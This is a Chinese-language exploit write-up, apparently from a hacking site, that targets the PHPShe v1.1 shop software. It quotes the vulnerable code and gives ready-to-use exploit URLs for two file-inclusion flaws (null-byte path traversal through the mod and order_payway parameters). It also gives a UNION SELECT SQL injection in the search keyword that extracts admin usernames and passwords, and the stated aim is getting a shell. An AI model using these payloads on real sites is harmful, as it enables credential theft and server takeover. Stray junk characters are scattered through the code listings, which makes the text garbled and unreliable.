phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin

/*******************************************************/
4 I- C4 C' J6 ~) |/* Phpshe v1.1 Vulnerability
/* ========================
/* By: : Kn1f3
) X( N1 @: ~% U" W* c( U' a/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输
/ K8 G1 E0 n5 w9 N


//common.php
/ G/ ?# y; }3 V! Xif (get_magic_quotes_gpc()) {
# B5 u6 G7 J, a" M* j% }9 o' b/ q1 A!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
; T) V. K. H9 B7 [* O}
# x) a+ F  u" M  \! Gelse {
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
1 [5 O4 a1 N/ p}
. a0 N3 P9 H  T* T; Ksession_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
* X! f& R% h1 \/ ]! M, W6 O: K!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
' R6 i$ K6 V% s  s/ ~+ m# h
# ?0 @& \9 [& T% y4 ~0×01 包含漏洞
9 ]! z2 h! C5 ~' C* O7 m/ d) B
( s# x8 S. Z$ J5 z
//首页文件
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
1 k1 ?' [4 |; \1 p7 U, S3 H1 upe_result();
9 A% u( L% H7 i9 K- n7 u?>
//common 文件 第15行开始
url路由配置
$module = $mod = $act = 'index';
3 j4 ^7 j$ |) w, t5 U# Q$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
6 Q4 n8 M) k# P: ~5 q0 v8 {$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
3 U9 Q- h" i+ j5 K5 A

" t% l/ o/ ^/ C; J+ ?) E1 c+ c: O 0×02 搜索注入
; l7 ^- k& k5 x2 f# ~1 X
1 b7 ?( Z1 F# T$ q<code id="code2">

//product.php文件
case 'list':
$ Z/ j: G2 h/ W/ A* B3 {0 _$category_id = intval($id);
! O3 m) z, J) x$info = $db->pe_select('category', array('category_id'=>$category_id));
//搜索
: O4 G. e/ x7 r7 ~' s$sqlwhere = " and `product_state` = 1";
/ s: N2 i6 a: _1 x0 L) u( {' vpe_lead('hook/category.hook.php');
" a+ i" I8 w+ [) p+ \if ($category_id) {
% C9 S) g( K1 Q% Cwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
}
/ z1 B* f, I+ n8 ]9 t  `$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
, z$ C( R; W. C+ }if ($_g_orderby) {
  O" v! ^* j/ P' T  R$orderby = explode('_', $_g_orderby);
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
}
else {
$sqlwhere .= " order by `product_id` desc";
}
+ T' B0 c8 Y% k$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
//热卖排行
, R+ a3 V- @' }! O5 B9 r, Q$product_hotlist = product_hotlist();
//当前路径
  q* |5 i* {; J% P$ G3 p/ X1 e. ^3 X$nowpath = category_path($category_id);
$seo = pe_seo($info['category_name']);
1 ]4 G$ _2 ~! A/ ?include(pe_tpl('product_list.html'));
//跟进selectall函数库
6 ^: T" Z$ M) t" b2 m  {& zpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
5 u/ J; F) y6 L" r2 @, m: w{
//处理条件语句
9 _. M+ g: a5 [4 m: T$sqlwhere = $this->_dowhere($where);
$ h+ b/ t/ W' n, hreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
4 c' X4 \2 j  t6 f; l}
: Q2 D  R! g+ H! ~8 t& z5 h, ?. G//exp
: G" h& x' T$ q# }9 nproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
, R4 S: L$ r/ N4 }; j. N

</code>

! }) ]6 r9 _- ^0×03 包含漏洞2
5 r/ U0 A. @8 N$ D$ P
1 X9 c7 M  L" ~7 I/ }$ A! w7 }( o) U/ Y<code id="code3">

//order.php

case 'pay':

$order_id = pe_dbhold($_g_id);

$cache_payway = cache::get('payway');

foreach($cache_payway as $k => $v) {

9 s9 {: |' e( }, l4 ~1 N! W$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

! |3 g' _0 A/ v' H! lif ($k == 'bank') {

$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

- {$ ~. Z0 @8 y& J1 ^1 h; _, |}

}

4 |# ~4 C2 q/ q* n& W( I$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

!$order['order_id'] && pe_error('订单号错误...');

# Q3 Q: M: u" Q6 ]% y$ z! D  W1 Oif (isset($_p_pesubmit)) {

5 E1 r4 J: e- l( a0 _if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

4 J# e" i8 Z0 q2 s& g' E" ]$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

  D$ R6 |' G6 [0 H/ d9 vforeach ($info_list as $v) {

$order['order_name'] .= "{$v['product_name']};";

4 w$ G3 |9 @7 \- ~% U) L}

: W  Z0 X. v1 ]1 v: {! s& zecho '正在为您连接支付网站，请稍后...';

8 y  s3 Q2 D+ U% Y; x1 y( Vinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

}//当一切准备好的时候就可以进行"鸡肋包含了"

% l/ g; i0 h+ k9 Yelse {

1 F/ O* m) T, R3 V! Vpe_error('支付错误...');

  x: Y/ K* K$ b7 g}

}

$seo = pe_seo('选择支付方式');

include(pe_tpl('order_pay.html'));

5 c! b4 }+ Y* b# @0 @' }% a% R9 fbreak;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
7 R: s- w* j5 Q8 e3 J$ whttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg